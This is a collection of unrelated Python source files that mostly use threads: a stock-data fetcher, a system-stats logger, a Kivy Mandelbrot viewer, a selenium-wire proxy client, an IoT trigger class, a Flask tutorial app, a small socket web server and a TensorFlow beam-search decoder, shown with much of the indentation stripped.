return (pd.concat([self.api_no_connection.to_df(i.result()) for i in data]), datetime.datetime.now())
except:
pass
def get_security_bar_concurrent(self, code, _type, lens):
try:
data = {self.get_security_bars(self.get_frequence(_type), self.get_market(
str(code)), str(code), 0, lens) for code in code}
return [i.result() for i in data]
except:
raise Exception
def _get_security_bars(self, context, code, _type, lens):
try:
_api = self.get_available()
for i in range(1, int(lens / 800) + 2):
context.extend(_api.get_security_bars(self.get_frequence(
_type), self.get_market(str(code)), str(code), (i - 1) * 800, 800))
print(context)
self._queue.put(_api)
return context
except Exception as e:
return self._get_security_bars(context, code, _type, lens)
def get_security_bar(self, code, _type, lens):
        code = [code] if isinstance(code, str) else code
context = []
try:
for item in code:
context = self._get_security_bars(context, item, _type, lens)
return context
except Exception as e:
raise e
def save_mongo(self, data, client=DATABASE):
database = DATABASE.get_collection(
'realtime_{}'.format(datetime.date.today()))
database.insert_many(QA_util_to_json_from_pandas(data))
def get_bar(timeout=1, sleep=1, thread=2):
sleep = int(sleep)
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
print(len(code))
x = QA_Tdx_Executor(timeout=float(timeout), thread_num=int(thread))
print(x._queue.qsize())
print(x.get_available())
while True:
_time = datetime.datetime.now()
        if QA_util_if_tradetime(_time):  # within trading hours
data = x.get_security_bar_concurrent(code, 'day', 1)
print('Time {}'.format(
(datetime.datetime.now() - _time).total_seconds()))
time.sleep(sleep)
print('Connection Pool NOW LEFT {} Available IP'.format(
x._queue.qsize()))
print('Program Last Time {}'.format(
(datetime.datetime.now() - _time1).total_seconds()))
return data
else:
print('Not Trading time {}'.format(_time))
time.sleep(sleep)
def get_day_once():
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
x = QA_Tdx_Executor()
return x.get_security_bar_concurrent(code, 'day', 1)
@click.command()
@click.option('--timeout', default=0.2, help='timeout param')
@click.option('--sleep', default=1, help='sleep step')
@click.option('--thread', default=2, help='thread nums')
def bat(timeout=0.2, sleep=1, thread=2):
sleep = int(sleep)
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
print(len(code))
x = QA_Tdx_Executor(timeout=float(timeout), thread_num=int(thread))
print(x._queue.qsize())
print(x.get_available())
database = DATABASE.get_collection(
'realtime_{}'.format(datetime.date.today()))
print(database)
database.create_index([('code', QA_util_sql_mongo_sort_ASCENDING),
('datetime', QA_util_sql_mongo_sort_ASCENDING)])
while True:
_time = datetime.datetime.now()
        if QA_util_if_tradetime(_time):  # within trading hours
data = x.get_realtime_concurrent(code)
data[0]['datetime'] = data[1]
x.save_mongo(data[0])
print('Time {}'.format(
(datetime.datetime.now() - _time).total_seconds()))
time.sleep(sleep)
print('Connection Pool NOW LEFT {} Available IP'.format(
x._queue.qsize()))
print('Program Last Time {}'.format(
(datetime.datetime.now() - _time1).total_seconds()))
else:
print('Not Trading time {}'.format(_time))
time.sleep(sleep)
if __name__ == '__main__':
import time
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_list_adv
code = QA_fetch_stock_list_adv().code.tolist()
# DATABASE.realtime.create_index([('code', QA_util_sql_mongo_sort_ASCENDING),
# ('datetime', QA_util_sql_mongo_sort_ASCENDING)])
# print(len(code))
# x = QA_Tdx_Executor()
# print(x._queue.qsize())
# print(x.get_available())
# #data = x.get_security_bars(code[0], '15min', 20)
# # print(data)
# # for i in range(5):
# # print(x.get_realtime_concurrent(code))
# for i in range(100000):
# _time = datetime.datetime.now()
# if QA_util_if_tradetime(_time): # 如果在交易时间
# #data = x.get_realtime(code)
# data = x.get_realtime_concurrent(code)
# data[0]['datetime'] = data[1]
# x.save_mongo(data[0])
# # print(code[0])
# #data = x.get_security_bars(code, '15min', 20)
# # if data is not None:
# print(len(data[0]))
# # print(data)
# print('Time {}'.format((datetime.datetime.now() - _time).total_seconds()))
# time.sleep(1)
# print('Connection Pool NOW LEFT {} Available IP'.format(x._queue.qsize()))
# print('Program Last Time {}'.format(
# (datetime.datetime.now() - _time1).total_seconds()))
# # print(threading.enumerate())
# #
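

# ----------------------------------------------------------------------------
# Hedged usage sketch (added for illustration, not part of QUANTAXIS): any
# pytdx method that is not defined on QA_Tdx_Executor is forwarded through
# __getattr__ to a pooled connection and returns a concurrent.futures.Future.
# The stock code below is hypothetical.
# ----------------------------------------------------------------------------
def _example_forwarded_call():
    x = QA_Tdx_Executor(thread_num=1)
    # get_security_quotes is a pytdx TdxHq_API method, not an executor method,
    # so the call is scheduled on the executor's thread pool.
    future = x.get_security_quotes([(0, '000001')])
    return x.api_no_connection.to_df(future.result())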
|
pc-stats.py
|
import time
import psutil, socket
from datetime import datetime
import requests, sys
from threading import Thread
def parseCPU():
log = psutil.cpu_freq(percpu=False).current
return log
def parseTemp():
log = str(psutil.sensors_temperatures()).split("current=")[1].split(",")[0]
return '{} C'.format(log)
def parseMemory():
log = psutil.virtual_memory().percent
return '{}%'.format(log)
def parseSwap():
log = psutil.swap_memory().used
    # psutil reports swap usage in bytes; convert to megabytes.
    return '%s MB' % str(int(log) // (1024 * 1024))
def parseProcessInfo():
processDict = psutil.Process().as_dict(attrs=['pid', 'name'])
return '{}[{}]'.format(processDict['name'], processDict['pid'])
if __name__ == "__main__":
flag = False
logs = []
url = "http://localhost:3000/logs" if not len(sys.argv) == 2 else sys.argv[1]
headers = {'Content-type': 'application/json'}
def sendLogs(flag):
while True:
time.sleep(5)
if len(logs) > 0:
received_logs = list(logs)
flag = True
logs.clear()
r = requests.post(url, json={"agent": "stanija", "logs": received_logs},
headers=headers)
if r.status_code == 200:
flag = False
Thread(target=sendLogs, args=(flag, ), daemon=True).start()
while True:
log = {}
stats = {}
stats['frequency'] = parseCPU()
stats['temperature'] = parseTemp()
stats['memory'] = parseMemory()
stats['swap'] = parseSwap()
log["message"] = stats
log["logged_time"] = datetime.now().strftime('%m/%d/%Y %H:%M:%S')
log["host"] = socket.gethostname()
log["process"] = parseProcessInfo()
logs.append(log)
time.sleep(3)
|
app.py
|
from kivy.app import App
from kivy.app import async_runTouchApp
from kivy.uix.layout import Layout
from kivy.uix.widget import Widget
from kivy.uix.gridlayout import GridLayout
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.uix.progressbar import ProgressBar
from kivy.uix.textinput import TextInput
from kivy.uix.popup import Popup
from kivy.factory import Factory
from kivy.config import Config
from kivy.core.window import Window
from kivy.graphics import Color, Rectangle
from kivy.properties import (NumericProperty, ReferenceListProperty, ObjectProperty)
import requests
import time, threading
Window.size = (900, 900)
# API_ENDPOINT = "127.0.0.1:8180"
API_ENDPOINT = "mood.guigxs.com"
def inter_1d(pos, min, max):
return min + pos * (max - min)
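# Hedged worked example (added for illustration): inter_1d linearly maps a
# position in [0, 1] onto the interval [min, max], e.g. a pixel column of the
# 800-wide grid onto a real coordinate between start_x and end_x.
def _inter_1d_examples():
    assert inter_1d(0.0, -2, 1) == -2
    assert inter_1d(0.5, -2, 1) == -0.5
    assert inter_1d(1.0, -2, 1) == 1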
class Pixel(Widget):
max_iter = NumericProperty()
def __init__(self, request_parms, position, size, **kwargs):
self.request_parms = request_parms
self.position = position
self.pixel_size = size
super(Pixel, self).__init__(**kwargs)
r = requests.get(f'http://{API_ENDPOINT}?complex_r={self.request_parms[0]}&complex_i={self.request_parms[1]}&iter={self.max_iter}')
self.color = abs(1-(r.json()["response"]/self.max_iter))
# Arranging Canvas
with self.canvas:
Color(self.color, 0, 0) # set the colour
# Setting the size and position of canvas
self.rect = Rectangle(pos = self.position, size=(self.pixel_size, self.pixel_size))
class Grid(Widget):
width = NumericProperty(800)
height = NumericProperty(800)
start_x = NumericProperty(-2)
end_x = NumericProperty(1)
start_y = NumericProperty(-1.5)
end_y = NumericProperty(1.5)
start_cols = NumericProperty(0)
cols = NumericProperty(800)
start_rows = NumericProperty(0)
rows = NumericProperty(800)
pixel_size = NumericProperty(100)
zoom = NumericProperty(1)
def __init__(self, **kwargs):
super(Grid, self).__init__(**kwargs)
self.build()
def build(self, monitor=False):
start = time.time()
with self.canvas:
layout = GridLayout(cols=self.cols, rows=self.rows)
for i in range(self.start_cols, self.cols, self.pixel_size):
for j in range(self.start_rows, self.rows, self.pixel_size):
real_values = (inter_1d(i/self.cols, self.start_x, self.end_x), inter_1d(j/self.rows, self.start_y, self.end_y))
graph_values = (i, j)
layout.add_widget(Pixel(real_values, graph_values, self.pixel_size))
if (monitor):
App.get_running_app().pop_up.update_value(i/(self.cols))
print(f"Widget ({self.width}, {self.height}) built in x : [{self.start_x}...{self.end_x}] y : [{self.start_y}...{self.end_y}] with pixel size = {self.pixel_size} in {round(time.time() - start, 2)}s")
def refresh(self):
self.build(monitor=True)
App.get_running_app().dismiss_popup()
class PopupBox(Popup):
pop_up_text = ObjectProperty()
loading_value = ObjectProperty()
def update_pop_up_text(self, p_message):
self.pop_up_text.text = p_message
def update_value(self, value):
self.loading_value.value = value*100
class MandelbrotApp(App):
zoom = NumericProperty(1)
def dismiss_popup(self):
self.pop_up.dismiss()
def show_popup(self):
self.pop_up = Factory.PopupBox()
self.pop_up.update_pop_up_text('Rebuilding the area, please wait...')
self.pop_up.open()
def add(self, val):
self.show_popup()
self.grid.pixel_size = int(self.grid.pixel_size * 2)
self.pixel_size.text = f"Pixel size: {self.grid.pixel_size}"
mythread = threading.Thread(target=self.grid.refresh)
mythread.start()
def sub(self, val):
self.show_popup()
self.grid.pixel_size = int(self.grid.pixel_size / 2)
self.pixel_size.text = f"Pixel size: {self.grid.pixel_size}"
mythread = threading.Thread(target=self.grid.refresh)
mythread.start()
def set_size(self, val):
self.show_popup()
self.grid.pixel_size = int(self.size_input.text)
self.pixel_size.text = f"Pixel size: {self.grid.pixel_size}"
mythread = threading.Thread(target=self.grid.refresh)
mythread.start()
def change_coord(self, val):
self.show_popup()
self.grid.start_x = float(self.x0_input.text)
self.grid.end_x = float(self.x1_input.text)
self.grid.start_y = float(self.y0_input.text)
self.grid.end_y = float(self.y1_input.text)
mythread = threading.Thread(target=self.grid.refresh)
mythread.start()
def fill_boxes(self):
self.x0_input.text = str(self.grid.start_x)
self.x1_input.text = str(self.grid.end_x)
self.y0_input.text = str(self.grid.start_y)
self.y1_input.text = str(self.grid.end_y)
def build(self):
parent = Widget()
self.grid = Grid()
self.pixel_size = Label(text=f"Pixel size: {self.grid.pixel_size}", pos= (100, 800),)
self.label = Label(text=f"To:", pos= (800, 500), font_size=40)
self.size_input = TextInput(hint_text='New size', multiline=False, pos=(600, 800), halign="center")
self.x0_input = TextInput(hint_text='x0', multiline=False, pos=(800, 400), font_size=40, halign="center")
self.x1_input = TextInput(hint_text='x1', multiline=False, pos=(800, 300), font_size=40, halign="center")
self.y0_input = TextInput(hint_text='y0', multiline=False, pos=(800, 200), font_size=40, halign="center")
self.y1_input = TextInput(hint_text='y1', multiline=False, pos=(800, 100), font_size=40, halign="center", line_height=10)
self.button_go = Button(text='GO', pos=(800, 0), on_press=self.change_coord, font_size=40)
parent.add_widget(self.grid)
parent.add_widget(Button(text="-", pos= (0, 800), on_press=self.sub, font_size=50))
parent.add_widget(self.pixel_size)
parent.add_widget(Button(text="+", pos=(200, 800), on_press=self.add, font_size=50))
parent.add_widget(self.size_input)
parent.add_widget(Button(text="GO", pos=(700, 800), on_press=self.set_size, font_size=40))
parent.add_widget(self.x0_input)
parent.add_widget(self.x1_input)
parent.add_widget(self.y0_input)
parent.add_widget(self.y1_input)
parent.add_widget(self.button_go)
parent.add_widget(self.label)
self.fill_boxes()
return parent
if __name__ == '__main__':
MandelbrotApp().run()
|
client.py
|
import http.client
import json
import logging
import threading
from urllib.parse import quote_plus
from .handler import ADMIN_PATH, CaptureRequestHandler, create_custom_capture_request_handler
from .server import ProxyHTTPServer
log = logging.getLogger(__name__)
class AdminClient:
"""Provides an API for sending commands to a remote proxy server."""
def __init__(self, proxy_mgr_addr=None, proxy_mgr_port=None):
# The address of the proxy manager if set
self._proxy_mgr_addr = proxy_mgr_addr
self._proxy_mgr_port = proxy_mgr_port
# Reference to a created proxy instance and its address/port
self._proxy = None
self._proxy_addr = None
self._proxy_port = None
self._capture_request_handler = None
def create_proxy(self, addr='127.0.0.1', port=0, proxy_config=None, options=None):
"""Creates a new proxy server and returns the address and port number that the
server was started on.
Args:
addr: The address the proxy server will listen on. Default 127.0.0.1.
port: The port the proxy server will listen on. Default 0 - which means
use the first available port.
proxy_config: The configuration for any upstream proxy server. Default
is None.
options: Additional options to configure the proxy.
Returns:
A tuple of the address and port number of the created proxy server.
"""
if self._proxy_mgr_addr is not None and self._proxy_mgr_port is not None:
# TODO: ask the proxy manager to create a proxy and return that
pass
if options is None:
options = {}
custom_response_handler = options.get('custom_response_handler')
if custom_response_handler is not None:
self._capture_request_handler = create_custom_capture_request_handler(custom_response_handler)
else:
self._capture_request_handler = CaptureRequestHandler
self._capture_request_handler.protocol_version = 'HTTP/1.1'
self._capture_request_handler.timeout = options.get('connection_timeout', 5)
self._proxy = ProxyHTTPServer((addr, port), self._capture_request_handler,
proxy_config=proxy_config, options=options)
t = threading.Thread(name='Selenium Wire Proxy Server', target=self._proxy.serve_forever)
t.daemon = not options.get('standalone')
t.start()
socketname = self._proxy.socket.getsockname()
self._proxy_addr = socketname[0]
self._proxy_port = socketname[1]
log.info('Created proxy listening on {}:{}'.format(self._proxy_addr, self._proxy_port))
return self._proxy_addr, self._proxy_port
def destroy_proxy(self):
"""Stops the proxy server and performs any clean up actions."""
log.info('Destroying proxy')
# If proxy manager set, we would ask it to do this
self._proxy.shutdown()
self._proxy.server_close() # Closes the server socket
def get_requests(self):
"""Returns the requests currently captured by the proxy server.
The data is returned as a list of dictionaries in the format:
[{
'id': 'request id',
'method': 'GET',
'path': 'http://www.example.com/some/path',
'headers': {
'Accept': '*/*',
'Host': 'www.example.com'
},
'response': {
'status_code': 200,
'reason': 'OK',
'headers': {
'Content-Type': 'text/plain',
'Content-Length': '15012'
}
}
}, ...]
Note that the value of the 'response' key may be None where no response
is associated with a given request.
Returns:
A list of request dictionaries.
"""
return self._make_request('GET', '/requests')
def get_last_request(self):
"""Returns the last request captured by the proxy server.
This is more efficient than running get_requests()[-1]
Returns:
The last request as a dictionary or None if no requests have been
made.
"""
return self._make_request('GET', '/last_request')
def clear_requests(self):
"""Clears any previously captured requests from the proxy server."""
self._make_request('DELETE', '/requests')
def find(self, path):
"""Find the first request that contains the specified path.
Requests are searched in chronological order.
Args:
path: The request path which can be any part of the request URL.
"""
return self._make_request('GET', '/find?path={}'.format(quote_plus(str(path))))
def get_request_body(self, request_id):
"""Returns the body of the request with the specified request_id.
Args:
request_id: The request identifier.
Returns:
The binary request body, or None if the request has no body.
"""
return self._make_request('GET', '/request_body?request_id={}'.format(request_id)) or None
def get_response_body(self, request_id):
"""Returns the body of the response associated with the request with the
specified request_id.
Args:
request_id: The request identifier.
Returns:
The binary response body, or None if the response has no body.
"""
return self._make_request('GET', '/response_body?request_id={}'.format(request_id)) or None
def set_header_overrides(self, headers):
"""Sets the header overrides.
Args:
headers: A dictionary of headers to be used as overrides. Where the value
of a header is set to None, this header will be filtered out.
"""
self._make_request('POST', '/header_overrides', data=headers)
def clear_header_overrides(self):
"""Clears any previously set header overrides."""
self._make_request('DELETE', '/header_overrides')
def get_header_overrides(self):
"""Gets any previously set header overrides"""
return self._make_request('GET', '/header_overrides')
def set_rewrite_rules(self, rewrite_rules):
"""Sets the rewrite rules.
Args:
rewrite_rules: A list of rewrite rules. Each rule is a sublist (or 2-tuple)
containing the pattern and replacement.
"""
self._make_request('POST', '/rewrite_rules', data=rewrite_rules)
def clear_rewrite_rules(self):
"""Clears any previously set rewrite rules."""
self._make_request('DELETE', '/rewrite_rules')
def get_rewrite_rules(self):
"""Gets any previously set rewrite rules"""
return self._make_request('GET', '/rewrite_rules')
def set_scopes(self, scopes):
"""Sets the scopes for the seleniumwire to log/modify request and response.
Args:
scopes: a regex string or list of regex string.
"""
self._make_request('POST', '/scopes', data=scopes)
def reset_scopes(self):
"""Reset scopes to let proxy capture all requests."""
self._make_request('DELETE', '/scopes')
def get_scopes(self):
"""Gets any previously set scopes"""
return self._make_request('GET', '/scopes')
def _make_request(self, command, path, data=None):
url = '{}{}'.format(ADMIN_PATH, path)
conn = http.client.HTTPConnection(self._proxy_addr, self._proxy_port)
args = {}
if data is not None:
args['body'] = json.dumps(data).encode('utf-8')
conn.request(command, url, **args)
try:
response = conn.getresponse()
if response.status != 200:
raise ProxyException('Proxy returned status code {} for {}'.format(response.status, url))
data = response.read()
try:
if response.getheader('Content-Type') == 'application/json':
data = json.loads(data.decode(encoding='utf-8'))
except (UnicodeDecodeError, ValueError):
pass
return data
except ProxyException:
raise
except Exception as e:
raise ProxyException('Unable to retrieve data from proxy: {}'.format(e))
finally:
try:
conn.close()
except ConnectionError:
pass
class ProxyException(Exception):
"""Raised when there is a problem communicating with the proxy server."""
|
trigger.py
|
import time
import json
import redis
import threading
import sys
sys.path.append('..')
from logger.Logger import Logger, LOG_LEVEL
class Trigger():
def __init__(self, main_thread_running, system_ready, name='Trigger',key=None, source=None, thresholds=None, trigger_active=None, frequency='once', actions=[], trigger_interval=1, group=None):
self.name = name
self.key = key.replace(" ", "_").lower() if key is not None else self.name.replace(" ", "_").lower()
self.thresholds = thresholds
self.source = source.lower() if source is not None else source
self.trigger_interval = trigger_interval
self.actions = actions
self.group = group
self.frequency = frequency if group is None else "many"
        # Used to check if the trigger already fired without resetting
self.trigger_active = trigger_active
self.previous_state = trigger_active.is_set()
#Main thread events
self.main_thread_running = main_thread_running
self.system_ready = system_ready
return
def init_trigger(self):
#Initialize the trigger here (i.e. set listeners or create cron jobs)
pass
def check(self):
#Main trigger check loop to do things like fetch messages or check time
if self.group is not None:
self.group.check_group()
return
def run(self):
t = threading.Thread(target=self.check, args=())
t.start()
return t
def trigger(self, value=None):
try:
if self.group is None:
# Trigger the actions of the trigger
for action in self.actions:
action.trigger(value)
else:
self.group.trigger()
except Exception as e:
Logger.log(LOG_LEVEL["error"], "Error triggering action {0} ".format(self.key), e)
pass
return
def evaluateThresholds(self, value):
thresholds_passed = False
for threshold in self.thresholds:
comparison = threshold.get("comparison", "eq")
if comparison == "eq":
if value == threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
elif comparison == "ne":
if value != threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
elif comparison == "gt":
if value > threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
elif comparison == "gte":
if value >= threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
elif comparison == "lt":
if value < threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
elif comparison == "lte":
if value <= threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
return thresholds_passed
def decodeEventData(self, message):
if isinstance(message, dict):
#print('Dict Found')
return message
elif isinstance(message.decode('utf-8'), str):
try:
temp = json.loads(message.decode('utf-8'))
#print('Json Found')
return temp
except:
#print('Json Error. Str Found')
return {'event':'Unknown', 'data':message}
else:
#print('Failed to detect type')
return {'event':'Unknown', 'data':message}
def shutdown(self):
        # Put any closing functions here that should be called as MudPi shuts down (i.e. close connections)
return
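

# Hedged usage sketch (added for illustration, not part of MudPi): building a
# trigger and evaluating a threshold directly. The sensor name and threshold
# value below are hypothetical.
def _example_threshold_check():
    main_thread_running = threading.Event()
    system_ready = threading.Event()
    t = Trigger(
        main_thread_running,
        system_ready,
        name='Temp High',
        source='temperature_sensor',
        thresholds=[{"comparison": "gt", "value": 25}],
        trigger_active=threading.Event(),
    )
    return t.evaluateThresholds(30)  # True, because 30 > 25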
|
hello_run.py
|
import os
from flask import Flask, render_template, session, redirect, url_for
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail, Message
from flask_script import Manager,Shell
from flask_migrate import Migrate, MigrateCommand
from threading import Thread
basedir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['SECRET_KEY'] = 'hard to guess string'
app.config['SQLALCHEMY_DATABASE_URI'] =\
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['MAIL_SERVER'] = 'smtp.qq.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')
app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD')
app.config['FLASKY_MAIL_SUBJECT_PREFIX'] = '[Flasky]'
#app.config['FLASKY_MAIL_SENDER'] = 'Flasky Admin <flasky@example.com>'
#app.config['FLASKY_MAIL_SENDER'] = 'Kevin'  # setting the sender this way raises the error below:
#raise SMTPSenderRefused(code, resp, from_addr)
#smtplib.SMTPSenderRefused: (502, b'Invalid input from 120.36.45.8 to newxmesmtplogicsvrsza8.qq.com.', 'Kevin')
app.config['FLASKY_MAIL_SENDER'] = '1141526033@qq.com'
app.config['FLASKY_ADMIN'] = os.environ.get('FLASKY_ADMIN')
bootstrap = Bootstrap(app)
moment = Moment(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
mail = Mail(app)
manager = Manager(app)
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
users = db.relationship('User', backref='role', lazy='dynamic')
def __repr__(self):
return '<Role %r>' % self.name
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
def __repr__(self):
return '<User %r>' % self.username
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
print(to)
print(subject)
print(template)
print(kwargs)
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
class NameForm(FlaskForm):
name = StringField('What is your name?', validators=[DataRequired()])
submit = SubmitField('Submit')
@app.shell_context_processor
def make_shell_context():
return dict(db=db, User=User, Role=Role)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
@app.route('/', methods=['GET', 'POST'])
def index():
form = NameForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.name.data).first()
if user is None:
user = User(username=form.name.data)
db.session.add(user)
db.session.commit()
session['known'] = False
print(app.config)
if app.config['FLASKY_ADMIN']:
print('888888')
send_email(app.config['FLASKY_ADMIN'], 'New User',
'mail/new_user', user=user)
else:
session['known'] = True
session['name'] = form.name.data
return redirect(url_for('index'))
return render_template('index.html', form=form, name=session.get('name'),
known=session.get('known', False))
if __name__ == "__main__":
manager.run()
|
server.py
|
"""
Web Server
"""
import socket
import threading
from todo.config import HOST, PORT, BUFFER_SIZE
from todo.utils import Request, Response
from todo.controllers import routes
def process_connection(client):
"""处理客户端请求"""
# 接收请求报文数据
# 解决客户端发送数据长度等于 recv 接收的长度倍数时阻塞问题
# https://docs.python.org/zh-cn/3.7/library/socket.html#socket.socket.settimeout
client.settimeout(0)
request_bytes = b''
while True:
try:
chunk = client.recv(BUFFER_SIZE)
except BlockingIOError:
break
request_bytes += chunk
if len(chunk) < BUFFER_SIZE:
break
    # The full request message.
request_message = request_bytes.decode('utf-8')
print(f'request_message: {request_message}')
    # Parse the request message and build a Request object.
request = Request(request_message)
    # Build the response bytes from the Request object.
response_bytes = make_response(request)
    # Send the response.
client.sendall(response_bytes)
    # Close the connection.
client.close()
def make_response(request, headers=None):
"""构造响应报文"""
# 默认状态码为 200
status = 200
    # Look up the handler that matches the request path and the methods it accepts.
    # When request.path is '/' or '/index', routes.get(request.path) returns (index, ['GET']).
route, methods = routes.get(request.path)
    # If the request method is not allowed, return a 405 status code.
if request.method not in methods:
status = 405
data = 'Method Not Allowed'
else:
        # For the home page, route is the index view function defined in controllers.py.
data = route()
    # Serialize the response message.
response = Response(data, headers=headers, status=status)
response_bytes = bytes(response)
print(f'response_bytes: {response_bytes}')
return response_bytes
def main():
"""入口函数"""
with socket.socket() as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(5)
print(f'running on http://{HOST}:{PORT}')
while True:
client, address = s.accept()
print(f'client address: {address}')
            # Handle the client connection in a new thread.
t = threading.Thread(target=process_connection, args=(client,))
t.start()
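

# Hedged usage sketch (added for illustration): exercise a running server with
# a raw HTTP request over a plain socket. The path '/' is assumed to be served
# by the index view registered in todo.controllers.
def _example_raw_request(host=HOST, port=PORT):
    with socket.socket() as s:
        s.connect((host, port))
        s.sendall(b'GET / HTTP/1.1\r\nHost: localhost\r\n\r\n')
        return s.recv(BUFFER_SIZE).decode('utf-8')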
if __name__ == '__main__':
main()
|
strategies.py
|
import tensorflow as tf
import uuid
import numpy as np
import concurrent.futures
import asyncio
from threading import Thread
import os
from mincall.common import TOTAL_BASE_PAIRS
from keras import models
from mincall.external.tensorflow_serving.apis import predict_pb2
from mincall.external.tensorflow_serving.apis import prediction_service_pb2
from grpc.beta import implementations
class BeamSearchStrategy:
def beam_search(self, logits) -> concurrent.futures.Future:
        raise NotImplementedError()
class BeamSearchSess(BeamSearchStrategy):
def __init__(self, sess: tf.Session, surrogate_base_pair, beam_width):
self.sess = sess
if surrogate_base_pair:
self.logits_ph = tf.placeholder(
tf.float32, shape=(1, None, 2 * TOTAL_BASE_PAIRS + 1)
)
else:
self.logits_ph = tf.placeholder(
tf.float32, shape=(1, None, TOTAL_BASE_PAIRS + 1)
)
self.seq_len_ph = tf.placeholder_with_default(
[tf.shape(self.logits_ph)[1]], shape=(1,)
) # TODO: Write this sanely
with tf.name_scope("logits_to_bases"):
if beam_width > 0:
self.predict = tf.nn.ctc_beam_search_decoder(
inputs=tf.transpose(self.logits_ph, [1, 0, 2]),
sequence_length=self.seq_len_ph,
merge_repeated=surrogate_base_pair,
top_paths=1,
beam_width=beam_width,
)
elif beam_width == 0:
self.predict = tf.nn.ctc_greedy_decoder(
inputs=tf.transpose(self.logits_ph, [1, 0, 2]),
sequence_length=self.seq_len_ph,
merge_repeated=surrogate_base_pair,
)
else:
raise ValueError(f"Beam width cannot be <0, got {beam_width}")
self.predict_values = self.predict[0][0].values
def beam_search(self, logits: np.ndarray, loop=None):
assert len(
logits.shape
) == 2, f"Logits should be rank 2, got shape {logits.shape}"
f = concurrent.futures.Future()
f.set_result(
self.sess.run(
self.predict_values,
feed_dict={
self.logits_ph: logits[np.newaxis, :, :],
}
)
)
return f
class BeamSearchQueue:
def __init__(
self, sess: tf.Session, coord: tf.train.Coordinator, surrogate_base_pair
):
self.sess = sess
self.coord = coord
self.futures = {}
self.tf_inq = tf.FIFOQueue(
capacity=10,
dtypes=[tf.string, tf.float32],
)
self.tf_outq = tf.FIFOQueue(
capacity=10,
dtypes=[tf.string, tf.int64],
)
self.inq_name = tf.placeholder(tf.string)
self.inq_logits = tf.placeholder(tf.float32)
self.inq_enqueue = self.tf_inq.enqueue([self.inq_name, self.inq_logits])
self.inq_close = self.tf_inq.close()
with tf.name_scope("logits_to_bases"):
name, logits = self.tf_inq.dequeue()
self.predict = tf.nn.ctc_beam_search_decoder(
inputs=tf.transpose(logits, [1, 0, 2]),
sequence_length=[tf.shape(logits)[1]],
merge_repeated=surrogate_base_pair,
top_paths=1,
beam_width=50
)
enq_op = self.tf_outq.enqueue([
name,
self.predict[0][0].values,
])
qr = tf.train.QueueRunner(self.tf_outq, [enq_op] * os.cpu_count())
tf.train.add_queue_runner(qr)
self.out_dequeue = self.tf_outq.dequeue()
self.t = Thread(target=self._start, daemon=True)
self.t.start()
def _start(self):
try:
while True:
name, ind = self.sess.run(self.out_dequeue,)
name = name.decode("ASCII")
f = self.futures[name]
f.set_result(ind)
del self.futures[name]
except tf.errors.OutOfRangeError:
# Means the underlying queue is closed and we can safely exit
return
except Exception as ex:
self.coord.request_stop(ex)
raise
async def beam_search(self, logits, loop=None):
f = concurrent.futures.Future()
name = uuid.uuid4().hex
self.futures[name] = f
self.sess.run(
self.inq_enqueue,
feed_dict={
self.inq_name: name,
self.inq_logits: logits[np.newaxis, :, :],
},
)
return await asyncio.wrap_future(f, loop=loop)
def stop(self):
self.sess.run(self.inq_close)
self.t.join(timeout=10)
if self.t.is_alive():
raise ValueError("Thread still alive")
class BeamSearchTFServing(BeamSearchStrategy):
def __init__(
self,
host="localhost",
port=9001,
name="default",
signature_name=tf.saved_model.signature_constants.
DEFAULT_SERVING_SIGNATURE_DEF_KEY
):
self.channel = implementations.insecure_channel(host, int(port))
print(dir(self.channel))
self.stub = prediction_service_pb2.beta_create_PredictionService_stub(
self.channel
)
# Send request
request = predict_pb2.PredictRequest()
request.model_spec.name = name
request.model_spec.signature_name = signature_name
self.req = request
def beam_search(self, logits):
assert len(
logits.shape
) == 2, f"Logits should be rank 2, got shape {logits.shape}"
f = concurrent.futures.Future()
request = predict_pb2.PredictRequest()
request.CopyFrom(self.req)
request.inputs['logits'].CopyFrom(
tf.make_tensor_proto(logits[np.newaxis, :, :]),
)
result = self.stub.Predict(request, 120.0) # 120 secs timeout
f.set_result(np.array(result.outputs['path'].int64_val))
return f
